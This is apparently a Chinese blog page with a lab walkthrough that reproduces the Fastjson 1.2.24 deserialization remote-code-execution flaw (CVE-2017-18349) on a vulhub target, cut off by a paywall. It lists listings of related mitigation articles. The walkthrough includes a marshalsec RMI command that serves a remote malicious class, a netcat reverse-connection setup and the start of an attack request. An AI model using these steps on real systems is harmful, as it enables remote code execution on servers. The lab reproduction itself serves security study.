04-Fastjson反序列化漏洞

最新推荐文章于 2026-04-22 10:23:06 发布

原创

最新推荐文章于 2026-04-22 10:23:06 发布 · 2k 阅读

标签

#中间件 #fastjson #网络安全

收录于

免责声明
本文仅限于学习讨论与技术知识的分享，不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本文作者不为此承担任何责任，一旦造成后果请自行承担！

1、Fastjson介绍

2、漏洞复现

2.1、1.2.24 RCE CVE-2017-18349

vulhub启动靶场

启动成功
Kali 用marshalsec启动LDAP/RMI服务

在这里插入图片描述

Kali 用python启动HTTP服务，存放恶意类

这是我们的恶意代码
在这里插入图片描述
在jdk的bin目录下编译恶意文件

可以通过访问看有没有启动成功

Kali 用netcat监听端口，建立反弹连接

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.110.5:8089/#LinuxTouch" 9473

在这里插入图片描述

5、发送payload

POST / HTTP/1.1
Host: 192.168.110.16:8090
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 1

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

车海滨

关注关注

18
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

fastjson-1.2.83 针对近期阿里fastjson包漏洞，升级解决

05-24

Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞，经研究该防御策略在特定条件下可绕过默认 autoType 关闭限制，攻击远程服务器，风险影响较大。建议 Fastjson 用户尽快采取安全措施保障系统安全

参与评论您还未登录，请先登录后发表或查看评论

阿里巴巴开源的FastJson 1反序列化漏洞复现流程

10-04

包含RMI服务所需的内容和测试使用的攻击FastJson1反序列化漏洞的Java文件

Fastjson ＜ 1.2.83 任意代码执行漏洞(CVE-2022-25845)

北方的孤夜

12-14

8525

如何开启 fastjson safemode

fastjson1.2.83反序列化漏洞

Coder的博客

07-13

1万+

【代码】fastjson1.2.83反序列化漏洞。

别再为Fastjson漏洞发愁了！手把手教你开启SafeMode安全模式（附1.2.83版本配置）

最新发布

weixin_42524171的博客

04-22

209

本文详细介绍了如何通过开启Fastjson的SafeMode安全模式来有效防御反序列化漏洞攻击。从代码级防护到生产环境部署，提供了包括JVM参数配置、Dockerfile设置、白名单控制等全方位解决方案，特别针对1.2.83版本的安全配置进行实战演示，帮助开发者构建坚固的JSON解析安全防线。

Fastjson反序列化漏洞：深入探讨与安全防范

xycxycooo的博客

08-31

2444

通过本文的讲解，我们详细了解了Fastjson反序列化漏洞的原理、影响以及如何进行安全防范。Fastjson反序列化漏洞主要是由于Fastjson在反序列化过程中，对输入数据的安全性验证不足，导致攻击者可以构造恶意JSON数据，触发反序列化操作，进而执行任意代码或命令。为了避免这类漏洞，可以采取升级Fastjson版本、禁用@type自动类型解析、使用白名单机制和输入验证等安全防范措施。希望本文能够帮助你更好地理解和应用Fastjson反序列化漏洞的安全防范。如果你有任何问题或需要进一步的解释，请随时提问。

FastJson中AutoType反序列化漏洞

isxiaole的博客

05-06

1万+

FastJson中AutoType反序列漏洞梳理。

Fastjson反序列化远程代码执行漏洞

m0_56033865的博客

06-15

6388

据国家网络与信息安全信息通报中心监测发现，开源Java开发组件Fastjson存在反序列化远程代码执行漏洞。攻击者可利用上述漏洞实施任意文件写入、服务端请求伪造等攻击行为，造成服务器权限被窃取、敏感信息泄漏等严重影响。先贴一个解决漏洞的方案：不过任何升级一定会伴随或大或小的bug,一定要对业务的影响做评估。下面对漏洞原理进行介绍： fastjson 是阿里巴巴开发的 java语言编写的高性能 JSON 库，用于将数据在 Json 和 Java Object之间相互转换。它没有用java的序列化机制，而是自

Fastjson反序列化漏洞

blackmagic的博客

08-09

1893

使用恶意MySQL的url作为参数创建一个com.mysql.cj.jdbc.admin.MiniAdmin对象可以通过MySQL的JDBC驱动的com.mysql.cj.jdbc.admin.MiniAdmin类创建一个指定url的JDBC连接。再通过LOAD DATA LOCAL INFILE语句读取任意文件。只要用户期望类继承自 Throwable 类，Fastjson便会将该类信任，从而造成只要是继承Throwable的任意类都可以被反序列化。生成恶意mysql文件后，

【java安全】FastJson反序列化漏洞浅析

leekos的博客，分享web安全相关知识~

08-24

2220

前面我们学习了RMI和JNDI知识，接下来我们就可以来了解一下FastJson反序列化了FastJson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以将JSON字符串反序列化到JavaBean。

fastjson反序列化漏洞

qq_73792226的博客

08-15

1151

Fastjson是阿里巴巴公司开源的一款高性能的Java语言JSON处理库，广泛应用于Web开发、数据交换等领域。然而，由于Fastjson在解析JSON数据时存在安全漏洞，攻击者可以利用该漏洞执行任意代码，导致严重的安全威胁。Fastjson反序列化漏洞是一个严重的安全问题，需要引起足够的重视。开发者应该及时关注安全公告，升级Fastjson版本，并加强输入验证和安全管理。同时，用户也应关注系统安全，定期进行安全审计和监控，以确保系统的安全性。

Fastjson漏洞分析与复现

未完成的歌~的博客

08-26

2214

fastjson是阿里巴巴开源的JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串，这样得到字符串之后就可以通过数据库等方式进行持久化了。

Fastjson 1.83漏洞利用猜想

王嘟嘟的博客

02-12

1701

感觉这次有点老洞新用的意思，以上为猜测的一种可能性，目前未找到可用的调用链。能早点不用fastjson就不用尽早给低版本出具完全修复补丁，避免之后的各种漏洞影响，当然前提是不影响功能。以上。

安全漏洞笔记-Fastjson高危漏洞预警

在路上

11-06

685

• 其他项目通过搜索jar文件确定Fastjson版本号：lsof | grep fastjson。Fastjson官方发布公告称在1.2.80及以下版本中存在新的反序列化风险。• Maven：排查pom.xml，通过搜索Fastjson确定版本号。备份原fastjson依赖库，避免升级失败的情况发生。将低版本的fastjson库替换为1.2.83版本即可。漏洞影响版本: Fastjson ≤ 1.2.80。安全漏洞笔记-Fastjson高危漏洞预警。

关于Fastjson反序列化远程代码执行漏洞处理

企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net

05-25

1万+

建议将com.alibaba:fastjson升级至1.2.83